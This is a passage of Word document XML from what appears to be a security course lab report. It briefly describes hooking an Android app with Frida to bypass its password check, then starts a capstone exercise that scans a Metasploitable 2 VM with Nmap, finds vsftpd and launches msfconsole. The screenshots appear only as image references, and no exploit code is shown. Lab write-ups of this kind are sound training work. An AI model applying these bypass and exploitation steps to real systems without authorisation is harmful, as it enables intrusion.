          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A8E92BA" wp14:editId="30B31D1F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>39701</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5335325" cy="2667663"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="871900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900484" name=""/>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335325" cy="2667663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26703E3A" w14:textId="12BCCDA5" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3B0FF017" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6D7A84F5" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="104BACB5" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="422D5F6A" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="66FFDACD" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5AA0C068" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="433A4047" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="77E770A7" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2CBCD80B" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00A60B9C" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="61B2402B" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0E54A996" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="60FA8B8C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00A60B9C" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="06C87293" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="52E0166B" w14:textId="6F070FD3" w:rsidR="00F900B0" w:rsidRDefault="00FE688E" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00485B26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76AF3A2B" wp14:editId="7CF6F8FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288649</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3506525" cy="1175840"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="981113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113644" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3506525" cy="1175840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F900B0" w:rsidRPr="00B50DAD">
        <w:t>Write Frida Script</w:t>
      </w:r>
      <w:r w:rsidR="00F900B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8D65E" w14:textId="37E533F5" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="28D4C9A3" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00485B26" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="064844DD" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00485B26" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1D86932D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00485B26" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4EC8E45D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7837AEF0" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0F0E3CFD" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1BC3C46B" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00485B26" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5F4F8EF2" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26C24EE7" wp14:editId="6CF93A23">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3320236" cy="1431235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="700928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928912" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3328737" cy="1434899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C43974">
        <w:t>Run Frida Hook</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2BC6CA" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4C75E3F0" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00EE4AC0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="61B63CA3" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00EE4AC0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="274119E0" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00EE4AC0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="078A65FE" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="63777CEA" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4C311198" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7C75818F" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="46C7729D" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3B98F9DE" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6F0C0DB4" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D80B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50-word Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F9209" w14:textId="30384275" w:rsidR="004E6DFE" w:rsidRDefault="00F900B0" w:rsidP="004E6DFE">
      <w:r w:rsidRPr="0070376C">
        <w:t>The Android application's authentication features were dynamically hooked using Frida. Authentication checks were successfully circumvented by modifying the password verification procedure. This highlighted the danger of client-side validation in mobile applications and demonstrated inadequate runtime protection by permitting illegal access without proper credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE1F5E" w14:textId="6A9D920D" w:rsidR="00494017" w:rsidRDefault="0052459F" w:rsidP="0052459F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc224731506"/>
      <w:r w:rsidRPr="0052459F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capstone Project: Full VAPT Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="125FFA8A" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007F602D">
        <w:t>Record the Ip address of Metasploitable 2 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B48F8" w14:textId="7FF8DEE0" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007F602D">
        <w:t>The Ip address is 192.168.1.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCAF47D" w14:textId="098B42F8" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:r w:rsidRPr="007F602D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B1C6EAC" wp14:editId="4CDFA34B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7786</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4524292" cy="2908888"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="517043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043058" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4524292" cy="2908888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51122132" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3F906770" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="21DCF939" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3551C8C3" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="1D8FBE81" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2E8C104A" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="19FEC3AE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3548FE7D" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="62B969F4" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="112059C1" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="60592926" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4E59ADEA" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6171CB57" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6592A092" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4526E452" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="0011EB1F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007F602D">
        <w:t>Use Nmap in Kali Linux to find vulnerable services in Metasploitable2 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75A2C2" w14:textId="5C127B55" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007F602D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A6A16D8" wp14:editId="76149DFA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>278903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3782342" cy="3323645"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="815901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901365" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3782342" cy="3323645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007F602D">
        <w:t>The vulnerable service identified is ftp service (vsftpd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1C38C" w14:textId="5938333C" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5EE79585" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="755FE9FA" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7BA013C7" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4723B227" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3F765B8F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3AA34B2D" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="2587C91A" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="653AB66C" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="18752E1F" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="6277096A" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="0BB12385" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4A68355A" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="44409F3B" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="19809A88" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4028B77E" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="249F69C7" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="137908B0" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="636E9366" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="07DF2D69" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="34E470B9" w14:textId="77777777" w:rsidR="00EF5872" w:rsidRDefault="00EF5872" w:rsidP="00207B0D"/>
    <w:p w14:paraId="25AC4A09" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5DA0EEE5" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="007F602D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="01F9A6CE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE61FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B003F21" wp14:editId="21178262">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3480724" cy="3721210"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="983034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34580" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3480724" cy="3721210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Launch msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180D79E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="26DCBDBE" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7D67D75E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="13BE3DF1" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="045B05B8" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="32F71C0B" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="4CFB8E50" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="698F755E" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="3F967CFA" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="0B4556E5" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5D4E49F5" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="5DB12837" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="493006CF" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="63F5B663" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="400D8C06" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="35A59EDB" w14:textId="77777777" w:rsidR="00717C74" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="070F5B63" w14:textId="77777777" w:rsidR="00717C74" w:rsidRPr="00FE61FB" w:rsidRDefault="00717C74" w:rsidP="00207B0D"/>
    <w:p w14:paraId="7E233B05" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
    <w:p w14:paraId="289C38FC" w14:textId="77777777" w:rsidR="00207B0D" w:rsidRPr="00FE61FB" w:rsidRDefault="00207B0D" w:rsidP="00207B0D"/>
